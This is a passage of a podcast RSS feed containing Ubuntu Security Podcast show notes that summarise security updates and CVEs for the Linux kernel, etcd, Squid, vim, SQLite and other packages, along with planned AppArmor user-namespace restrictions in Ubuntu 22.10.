<li><a href="https://ubuntu.com/security/CVE-2022-1586">CVE-2022-1586</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 OOB read with crafted regexes - possible info leak</li>
</ul>
<h3 id="usn-5628-1-etcd-vulnerabilities-01-19">[<a href="https://ubuntu.com/security/notices/USN-5628-1">USN-5628-1</a>] etcd vulnerabilities [01:19]</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15114">CVE-2020-15114</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15113">CVE-2020-15113</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15112">CVE-2020-15112</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15106">CVE-2020-15106</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>distributed key/value store used by kubernetes</li>
<li>all these vulns come from a <a href="https://github.com/etcd-io/etcd/blob/main/security/SECURITY_AUDIT.pdf">security audit conducted by Trail of Bits</a> in January of 2020.
<ul>
<li>performed both manual and automated review -&gt; go-sec, errcheck, ineffassign etc</li>
<li>also fuzzed the WAL file handling (write-ahead logging - used to record
transactions that have been committed but not yet applied to the main
database)</li>
</ul>
</li>
<li>2 issues in WAL file handling (crash), plus one in handling of directory
permissions for a directory that may already exist (info leak) and one in
setup of endpoints that could allow a DoS</li>
</ul>
<h3 id="usn-5630-1-usn-5639-1-linux-kernel-vulnerabilities-02-45">[<a href="https://ubuntu.com/security/notices/USN-5630-1">USN-5630-1</a>, <a href="https://ubuntu.com/security/notices/USN-5639-1">USN-5639-1</a>] Linux kernel vulnerabilities [02:45]</h3>
<ul>
<li>6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-36946">CVE-2022-36946</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2503">CVE-2022-2503</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1729">CVE-2022-1729</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32296">CVE-2022-32296</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1012">CVE-2022-1012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33655">CVE-2021-33655</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 Raspi HWE 18.04 LTS / Azure CVM  20.04 LTS</li>
<li><a href="/episode-178/#usn-5622-1-linux-kernel-vulnerabilities-06-57">Same set of vulnerabilities covered in last weeks episode - [USN-5622-1] Linux kernel vulnerabilities</a></li>
</ul>
<h3 id="usn-5633-1-usn-5635-1-usn-5640-1-usn-5644-1-linux-kernel-vulnerabilities-03-09">[<a href="https://ubuntu.com/security/notices/USN-5633-1">USN-5633-1</a>, <a href="https://ubuntu.com/security/notices/USN-5635-1">USN-5635-1</a>, <a href="https://ubuntu.com/security/notices/USN-5640-1">USN-5640-1</a>, <a href="https://ubuntu.com/security/notices/USN-5644-1">USN-5644-1</a>] Linux kernel vulnerabilities [03:09]</h3>
<ul>
<li>11 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-36946">CVE-2022-36946</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-34495">CVE-2022-34495</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-34494">CVE-2022-34494</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33744">CVE-2022-33744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33743">CVE-2022-33743</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33742">CVE-2022-33742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33741">CVE-2022-33741</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33740">CVE-2022-33740</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26365">CVE-2022-26365</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2318">CVE-2022-2318</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33655">CVE-2021-33655</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 Raspi + GKE/GCP + Oracle + GCP (20.04)</li>
</ul>
<h3 id="usn-5634-1-linux-kernel--oem--vulnerability-03-23">[<a href="https://ubuntu.com/security/notices/USN-5634-1">USN-5634-1</a>] Linux kernel (OEM) vulnerability [03:23]</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-36946">CVE-2022-36946</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.17 OEM</li>
<li>netfilter remote DoS via crafted packet with a very short payload</li>
</ul>
<h3 id="usn-5632-1-oauthlib-vulnerability-03-40">[<a href="https://ubuntu.com/security/notices/USN-5632-1">USN-5632-1</a>] OAuthLib vulnerability [03:40]</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-36087">CVE-2022-36087</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OAuth implementation for Python3 - used by various other applications like
keystone, django, duplicity</li>
<li>DoS via a malicious redirect URL specifying an IPv6 address - could trigger an
exception -&gt; application crash -&gt; DoS</li>
</ul>
<h3 id="usn-5631-1-libjpeg-turbo-vulnerabilities-04-05">[<a href="https://ubuntu.com/security/notices/USN-5631-1">USN-5631-1</a>] libjpeg-turbo vulnerabilities [04:05]</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-46822">CVE-2021-46822</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-35538">CVE-2020-35538</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-17541">CVE-2020-17541</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-11813">CVE-2018-11813</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various issues in handling of crafted JPEG/PPM files - stack buffer overflow,
heap buffer overflow, NULL pointer dereference, resource consumption based DoS
in <code>cjpeg</code> utility - crafted file with a valid Targa header but incomplete
data - would keep trying pixel after reaching EOF - internally used <code>getc()</code>
which returns the special value <code>EOF</code> when the end of file is reached - this is
actually <code>-1</code> but requires the caller to check for this special value - if not,
would interpret this as pixel data (all bits set -&gt; 255,255,255 -&gt; white)
resulting in JPEG file that was possibly thousands of times bigger than the
input file - fixed to use existing input routines to read the data which
already check for <code>EOF</code> condition</li>
</ul>
<h3 id="usn-5629-1-python-vulnerability-05-54">[<a href="https://ubuntu.com/security/notices/USN-5629-1">USN-5629-1</a>] Python vulnerability [05:54]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-28861">CVE-2021-28861</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Open redirect in <code>http.server</code> through a URI which has multiple <code>/</code> at the
beginning - a URI such as <code>//path</code> gets treated as an absolute URI rather than a
path - could then end up sending a <code>301</code> location header with a misleading target</li>
<li>Upstream dispute this - state that it should not be used in production as it
only implements basic security checks</li>
</ul>
<h3 id="usn-5636-1-sos-vulnerability-06-39">[<a href="https://ubuntu.com/security/notices/USN-5636-1">USN-5636-1</a>] SoS vulnerability [06:39]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2806">CVE-2022-2806</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><code>sosreport</code> - used to gather details of a system etc for debug/analysis</li>
<li>Redacts passwords - previously used a hardcoded list of possible things that
could contain passwords - instead now looks for anything with the name
password and redacts that</li>
</ul>
<h3 id="usn-5637-1-libvpx-vulnerability-07-45">[<a href="https://ubuntu.com/security/notices/USN-5637-1">USN-5637-1</a>] libvpx vulnerability [07:45]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-0034">CVE-2020-0034</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB read -&gt; info leak / crash</li>
</ul>
<h3 id="usn-5638-1-expat-vulnerability-07-55">[<a href="https://ubuntu.com/security/notices/USN-5638-1">USN-5638-1</a>] Expat vulnerability [07:55]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-40674">CVE-2022-40674</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF with crafted XML content -&gt; crash / RCE</li>
</ul>
<h3 id="usn-5641-1-squid-vulnerabilities-08-06">[<a href="https://ubuntu.com/security/notices/USN-5641-1">USN-5641-1</a>] Squid vulnerabilities [08:06]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-41318">CVE-2022-41318</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41317">CVE-2022-41317</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to properly handle ACLs for cache manager, allowing a trusted client to
read other client ids / credentials and internal network structure</li>
<li>Integer overflow -&gt; buffer overread when using SSPI/SMB authentication helpers
for NTLM authentication - since this is in handling of credentials, could
allow an attacker to read decrypted user credentials or other memory regions
from Squid</li>
</ul>
<h3 id="usn-5642-1-webkitgtk-vulnerabilities-08-57">[<a href="https://ubuntu.com/security/notices/USN-5642-1">USN-5642-1</a>] WebKitGTK vulnerabilities [08:57]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-32886">CVE-2022-32886</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Buffer overflow when handling malicious web content -&gt; RCE</li>
</ul>
<h3 id="usn-5643-1-ghostscript-vulnerabilities-09-18">[<a href="https://ubuntu.com/security/notices/USN-5643-1">USN-5643-1</a>] Ghostscript vulnerabilities [09:18]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2085">CVE-2022-2085</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27792">CVE-2020-27792</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 issues in PDF file handling
<ul>
<li>NULL pointer dereference -&gt; DoS</li>
<li>heap buffer overflow -&gt; DoS / RCE</li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-22-dot-10--kinetic-kudu--beta-released-09-45">Ubuntu 22.10 (Kinetic Kudu) Beta Released [09:45]</h3>
<ul>
<li><a href="https://lists.ubuntu.com/archives/ubuntu-announce/2022-September/000284.html">https://lists.ubuntu.com/archives/ubuntu-announce/2022-September/000284.html</a></li>
<li>Includes details on how to upgrade - as per <a href="/episode-172/#ubuntu-22-dot-04-dot-1-lts-released-16-43">when we covered the Ubuntu 22.04.1
release</a> - if you do want to upgrade to the beta, and you are using 22.04
desktop, then first log out, switch to a virtual console (Ctrl-Alt-F2) and run
it from there as less chance that it takes down your whole graphical session
and hence the upgrade process partway through</li>
<li>Will cover in more detail when the final release comes out in a few weeks</li>
</ul>
<h3 id="preview-of-planned-unprivileged-user-namespace-restrictions-in-ubuntu-22-dot-10-11-05">Preview of planned unprivileged user namespace restrictions in Ubuntu 22.10 [11:05]</h3>
<ul>
<li>Often has been a source of increased attack surface for the kernel</li>
<li>Disabling of unpriv userns has often been recommended to mitigate various
kernel vulns</li>
<li>This is done via sysctl in Ubuntu:</li>
</ul>
<!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>sudo sysctl kernel.unprivileged_userns_clone<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>
</span></span></code></pre></div><ul>
<li>Big hammer - either on or off</li>
<li>Various applications have legitimate uses of unpriv userns
<ul>
<li>flatpak / bubblewrap etc</li>
<li>some of these ship a helper application which is setuid root so they can
still use user namespaces but this then creates another attack surface - the
setuid-root binary</li>
<li>instead it would be better to have a way to only allow particular
applications to use unprivileged user namespaces and then deny it to others</li>
<li>would provide much finer grained control to this potentially risky feature</li>
</ul>
</li>
<li>AppArmor developers have added support for just this
<ul>
<li>all unconfined applications would be denied and only confined applications
which have the userns permission would be allowed</li>
</ul>
</li>
<li>For now, it is planned to have this disabled by default for 22.10
<ul>
<li>AppArmor will have a sysctl to enable it so can be tested</li>
<li>Security team will work on getting the various packages within the Ubuntu archive that require unprivileged user namespaces to be confined by AppArmor and hence allowed to use them during the next development cycle</li>
</ul>
</li>
<li>With any luck, 23.04 will ship with this enabled along with AppArmor
confinement for things like bubblewrap etc that require this capability</li>
<li>Snaps will get it for free since they are confined by AppArmor out of the box</li>
<li>John Johansen is working with the kernel team to land this in the kernel for 22.10</li>
<li>Georgia Garcia is working on the userspace side to add support for creating
policy that specifies the userns permission in <code>apparmor</code> package too</li>
<li>Hopefully can all land both via the <a href="https://wiki.ubuntu.com/FreezeExceptionProcess">FeatureFreezeException (FFe) process</a></li>
</ul>
<h3 id="ubuntu-security-podcast-on-break-for-1-week">Ubuntu Security Podcast on break for 1 week</h3>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E179.mp3" length="16132493" type="audio/mpeg" /><itunes:duration>967</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 178
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-178/</link>
          <pubDate>Fri, 23 Sep 2022 15:36:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>a6046f312d6829a2168ac6205bf34b67766bdc72927dc70a31e08fd7b4dd6ed099bdd5650ba586a18cea3e465f6f73549999537a473811ed164a0b1c5bde6b71</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 178</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          You can't test your way out of security vulnerabilities (at least when writing
  your code in C), plus we cover security updates for Intel Microcode, vim,
  Wayland, the Linux kernel, SQLite and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  You can't test your way out of security vulnerabilities (at least when writing
  your code in C), plus we cover security updates for Intel Microcode, vim,
  Wayland, the Linux kernel, SQLite and more.
  </itunes:summary>
        <description>  You can't test your way out of security vulnerabilities (at least when writing
  your code in C), plus we cover security updates for Intel Microcode, vim,
  Wayland, the Linux kernel, SQLite and more.
  </description>
        <googleplay:description>  You can't test your way out of security vulnerabilities (at least when writing
  your code in C), plus we cover security updates for Intel Microcode, vim,
  Wayland, the Linux kernel, SQLite and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>You can&rsquo;t test your way out of security vulnerabilities (at least when writing
your code in C), plus we cover security updates for Intel Microcode, vim,
Wayland, the Linux kernel, SQLite and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>68 unique CVEs addressed</p>
<h3 id="usn-5606-2-poppler-regression-00-45">[<a href="https://ubuntu.com/security/notices/USN-5606-2">USN-5606-2</a>] poppler regression [00:45]</h3>
<ul>
<li>Affecting Xenial ESM (16.04 ESM), Bionic (18.04 LTS)</li>
<li><a href="/episode-177/#usn-5606-1-poppler-vulnerability-03-23">[USN-5606-1] poppler vulnerability from Episode 177</a> - integer overflow in
JBIG2 decoder</li>
<li>When backporting the series of patches, missed one that updated the
CMakeLists.txt to ensure a new header file that was added as part of the
security update is actually installed by the libpoppler-dev package - without
this if installed the update and then tried to recompile something locally it
would fail</li>
</ul>
<h3 id="usn-5612-1-intel-microcode-vulnerability-01-29">[<a href="https://ubuntu.com/security/notices/USN-5612-1">USN-5612-1</a>] Intel Microcode vulnerability [01:29]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-21233">CVE-2022-21233</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest upstream Intel Microcode release (IPU 2022.2) - only security relevant
for SGX</li>
</ul>
<h3 id="usn-5613-1-usn-5613-2-vim-vulnerabilities-01-54">[<a href="https://ubuntu.com/security/notices/USN-5613-1">USN-5613-1</a>, <a href="https://ubuntu.com/security/notices/USN-5613-2">USN-5613-2</a>] Vim vulnerabilities [01:54]</h3>
<ul>
<li>7 CVEs addressed in Trusty ESM (14.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1621">CVE-2022-1621</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1620">CVE-2022-1620</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1619">CVE-2022-1619</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1616">CVE-2022-1616</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1420">CVE-2022-1420</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1154">CVE-2022-1154</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0943">CVE-2022-0943</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various buffer overflows and the like that could be triggered when editing
crafted files - have said in the past that vim is fast becoming one of the
most security-patched packages in Ubuntu - all driven by their bug-bounty
<a href="https://huntr.dev/repos/vim/vim/">https://huntr.dev/repos/vim/vim/</a></li>
</ul>
<h3 id="usn-5614-1-wayland-vulnerability-02-17">[<a href="https://ubuntu.com/security/notices/USN-5614-1">USN-5614-1</a>] Wayland vulnerability [02:17]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3782">CVE-2021-3782</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Reference count overflow - used a 32-bit int to count the number of
references - but on a 64-bit machine it is quite possible that a malicious
client could allocate a huge amount of buffers to overflow and then possibly
get a UAF - highly unlikely to be able to exploit in practice since would also
need a large number of connections to the compositor as well - fixed by
limiting the max number of objects that can be allocated</li>
</ul>
<h3 id="usn-5615-1-sqlite-vulnerabilities-03-01">[<a href="https://ubuntu.com/security/notices/USN-5615-1">USN-5615-1</a>] SQLite vulnerabilities [03:01]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-20223">CVE-2021-20223</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-35527">CVE-2020-35527</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-35525">CVE-2020-35525</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>NULL ptr deref, OOB read, unicode parsing issue - disputed by upstream as an
actual vuln</li>
<li>Has such a large amount of tests - <a href="https://www.sqlite.org/testing.html">https://www.sqlite.org/testing.html</a>
<ul>
<li>for 151 KSLOC has 92,038 KSLOC of tests -&gt; 608 times as much code in tests
that the actual library itself</li>
<li>4 different test harnesses, 100% branch coverage, OOM tests, I/O error
tests, fuzz tests, boundary conditions, regression tests, valgrind, UB etc</li>
<li>yet still has new vulns discovered every now and then</li>
<li>you can&rsquo;t test your way out of security issues - at least when you write
your code in C which has just too many different operations that have UB</li>
<li>you can perhaps do it via formal methods (seL4 etc) but is <a href="https://sel4.systems/Info/Docs/GD-NICTA-whitepaper.pdf">very expensive</a>..
<ul>
<li>$200-400/LoC</li>
<li>eg. to formally prove SQLite would then cost ~$18.4M-$36.8M</li>
</ul>
</li>
<li>use rust?
<ul>
<li>would hopefully help at least for the first 2 issues - can still have
logic flaws and hence security vulns (eg. failing to properly validate a
TLS cert or similar)</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-5616-1-linux-kernel--intel-iotg--vulnerabilities-06-00">[<a href="https://ubuntu.com/security/notices/USN-5616-1">USN-5616-1</a>] Linux kernel (Intel IoTG) vulnerabilities [06:00]</h3>
<ul>
<li>10 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2959">CVE-2022-2959</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2873">CVE-2022-2873</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2503">CVE-2022-2503</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1973">CVE-2022-1973</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1943">CVE-2022-1943</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1852">CVE-2022-1852</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1729">CVE-2022-1729</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32296">CVE-2022-32296</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1012">CVE-2022-1012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33061">CVE-2021-33061</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15</li>
<li>Some of these have covered previously
<ul>
<li>Intel 10GbE PCI Express driver, IP source port randomisation failure, perf
UAF, KVM NULL ptr deref, various file-system OOB R/W etc</li>
</ul>
</li>
</ul>
<h3 id="usn-5621-1-linux-kernel-vulnerabilities-06-32">[<a href="https://ubuntu.com/security/notices/USN-5621-1">USN-5621-1</a>] Linux kernel vulnerabilities [06:32]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS)</li>
<li>4.15 GA 18.04 LTS, HWE 16.04 ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-36946">CVE-2022-36946</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33655">CVE-2021-33655</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>console framebuffer and netfilter OOB writes covered in previous episodes</li>
</ul>
<h3 id="usn-5622-1-linux-kernel-vulnerabilities-06-57">[<a href="https://ubuntu.com/security/notices/USN-5622-1">USN-5622-1</a>] Linux kernel vulnerabilities [06:57]</h3>
<ul>
<li>6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-36946">CVE-2022-36946</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2503">CVE-2022-2503</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1729">CVE-2022-1729</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32296">CVE-2022-32296</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1012">CVE-2022-1012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33655">CVE-2021-33655</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 GA 20.04 LTS / HWE 18.04 LTS</li>
</ul>
<p>x*** [<a href="https://ubuntu.com/security/notices/USN-5624-1">USN-5624-1</a>] Linux kernel vulnerabilities [07:05]</p>
<ul>
<li>11 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-36946">CVE-2022-36946</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-34495">CVE-2022-34495</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-34494">CVE-2022-34494</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33744">CVE-2022-33744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33743">CVE-2022-33743</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33742">CVE-2022-33742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33741">CVE-2022-33741</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33740">CVE-2022-33740</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26365">CVE-2022-26365</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2318">CVE-2022-2318</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33655">CVE-2021-33655</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 GA 22.04 LTS / Azure 20.04 LTS</li>
</ul>
<h3 id="usn-5623-1-linux-kernel--hwe--vulnerabilities-07-12">[<a href="https://ubuntu.com/security/notices/USN-5623-1">USN-5623-1</a>] Linux kernel (HWE) vulnerabilities [07:12]</h3>
<ul>
<li>21 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-36946">CVE-2022-36946</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-34495">CVE-2022-34495</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-34494">CVE-2022-34494</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33744">CVE-2022-33744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33743">CVE-2022-33743</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33742">CVE-2022-33742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33741">CVE-2022-33741</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33740">CVE-2022-33740</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2959">CVE-2022-2959</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2873">CVE-2022-2873</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26365">CVE-2022-26365</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2503">CVE-2022-2503</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2318">CVE-2022-2318</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1973">CVE-2022-1973</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1943">CVE-2022-1943</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1852">CVE-2022-1852</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1729">CVE-2022-1729</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32296">CVE-2022-32296</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1012">CVE-2022-1012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33655">CVE-2021-33655</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33061">CVE-2021-33061</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 20.04 HWE</li>
<li>all the vulns mentioned earlier plus a bunch in Xen (kernel side) - impact
ranges from crashing guest and exposing its memory to DoS services on the host</li>
</ul>
